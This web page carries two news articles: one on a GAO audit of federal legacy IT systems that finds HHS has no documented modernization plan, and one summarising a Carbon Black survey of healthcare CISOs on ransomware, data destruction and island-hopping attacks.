Share this article on:

The Government Accountability Office (GAO) has published the findings of an audit of all federal government systems that run on legacy systems. The aim of the audit was to determine the extent to which legacy software and systems are in use, and which departments are in most critical need of modernization.

In total, 65 federal agency systems were assessed at 24 different agencies to produce a list of the top ten systems in need of modernization. GAO then assessed the agencies’ plans to update their systems and measured those plans against IT modernization best practices.

The Department of Health and Human Services (HHS) was in the top three departments in need of modernization, behind the Department of Education (DoE) and the Department of Defense (DoD). Only three departments were deemed to have both high system criticality and a high security risk: HHS, DoE, and the Department of Homeland security.

The level of modernization required by HHS is considerable. One legacy system is 50 years old yet is still being extensively used to support clinical and patient administrative activities. GAO was unable to get an accurate gauge of the age of the systems in HHS. That unknown contributed to the high security risk rating.

The HHS is still using systems that have been written in C++ and MUMPS, both of which are legacy languages. One of the problems faced by the HHS is finding programmers who can code in MUMPS: A clear sign that modernization is desperately needed.

Th system has been developed to include a further 50 modules and is installed and used on hundreds of computers and are many different configuration variations. The system is invaluable, but cumbersome and difficult to develop and maintain.

GAO notes that the continued use of legacy infrastructure and software invariably involves a greater maintenance cost and the systems are exposed to more cybersecurity risks. Modernization is essential for managing those risks and improving efficiency and the effectiveness of the system.

While there are plans to modernize IT in most government departments, the HHS has yet to document a plan for modernizing IT. “When deciding to modernize a legacy system, [HHS] considers the degree to which core mission functions of the agency or other agencies are dependent on the system.” It is understandable why such an update has been put off.

Until a modernization plan is developed and implemented, which incorporates IT modernization and security best practices, the department “will have an increased risk of cost overruns, schedule delays, and project failure,” wrote GAO.

The HHS has recognized the issues raised by GAO and is keen to update its technical architecture and infrastructure, which continues to present many difficult challenges. A contract has been awarded to a third party to research how the HHS can modernize its systems in stages over the course of a year. Once that report has been received, HHS will develop its modernization plan, which it hopes to implement in 2020.

The HHS has one of the largest IT budgets of any government agency. Modernization has potential to reduce that cost, but GAO noted that the modernization will require a considerable capital investment and it is unclear when and if the modernization will actually lead to cost savings.

Follow Us

Share this article on:

A recent report from Carbon Black has revealed 66% of healthcare organizations have experienced a ransomware attack in the past year and 45% experienced an attack in which data destruction was the main motivation behind the attack.

The figures come from Carbon Black’s latest report: Healthcare Cyber Heists in 2019. Carbon Black sought input from 20 industry leading CISOs and questioned them about the cyberattacks they had experienced in the past year, the tactics used in the attacks, and how the threat landscape is evolving.

Last year was a record-breaking year for healthcare data breaches and attacks are continuing at an unprecedented level. April 2019 was the worst ever month for healthcare data breaches with 46 major breaches (500+ records) reported to the HHS’ Office for Civil Rights.

“The potential, real-world effect cyberattacks can have on healthcare organizations and patients is substantial,” explained Rick McElroy, Carbon Black’s Head of Security Strategy and co-author of the report. “Cyber attackers have the ability to access, steal and sell patient information on the dark web. Beyond that, they have the ability to shut down a hospital’s access to critical systems and patient records, making effective patient care virtually impossible.”

83% of surveyed CISOs believe there has been an increase in cyberattacks over the past 12 months and 66% of CISO’s think attacks have grown in sophistication in the past year.

Two thirds of surveyed organizations have had to deal with an attempted ransomware attack in the past 12 months. A variety of ransomware variants were used although Kryptik/GenKryptik ransomware variants were most common and were used in 74% of attacks.

Almost half of respondents experienced a data destruction attack. These attacks involved the destruction of data in an attempt to paralyze business operations. The attacks are commonly associated with nation-state sponsored hacking groups in Russia, China, and North Korea.

While there were many different methods used to attack healthcare organizations, one of the most common was the use of Excel spreadsheets containing macro-enabled PowerShell to download malware.

One third of CISOs said they had experienced an ‘island hopping’ attack in the past year. This is where hackers have compromised a third party and used it to attack their organization. For example, an attack via partner-provisioned Virtual Desktop Infrastructure access, VPNs, or private network links. One third of CISOs also said counter incident response tactics were used by the hackers to prevent mitigation of a breach and to try to maintain persistent access.

CISOs were also asked about their biggest concerns. Compliance was the most stated area of concern (33%) followed by budget restrictions (22%), loss of patient data (16%), and vulnerable devices (16%).

Compliance as the main concern is worrying. It suggests healthcare organizations believe that becoming compliant with HIPAA equates to robust cybersecurity when that is not the case. Compliance with HIPAA only means an organization has achieved a baseline level of security. Many healthcare organizations that were HIPAA-complaint have still experienced data breaches. It is important for compliance to be viewed as a starting point in an organization’s security program. Once HIPAA compliant, security programs must be developed further.

The report shows organizations have realized the importance of staff security awareness training, not just for compliance but for improving security posture. 84% of organizations provide staff security awareness training at least annually with 45% providing more frequent training sessions.

When asked to rate their security posture, most CISOs believed there was still considerable room for improvement. 74% gave their organization a B or less (25% B, 16% B-, 33% C).

While the majority of organizations that engage in threat hunting say that it has significantly improved their cybersecurity posture, only one third of respondents said they had a threat hunting team. Carbon Black notes that threat hunting is no longer reserved for the security elite. Threat hunting software is available to help businesses of all sizes gain better visibility and find and address threats before they result in a data breach.

Follow Us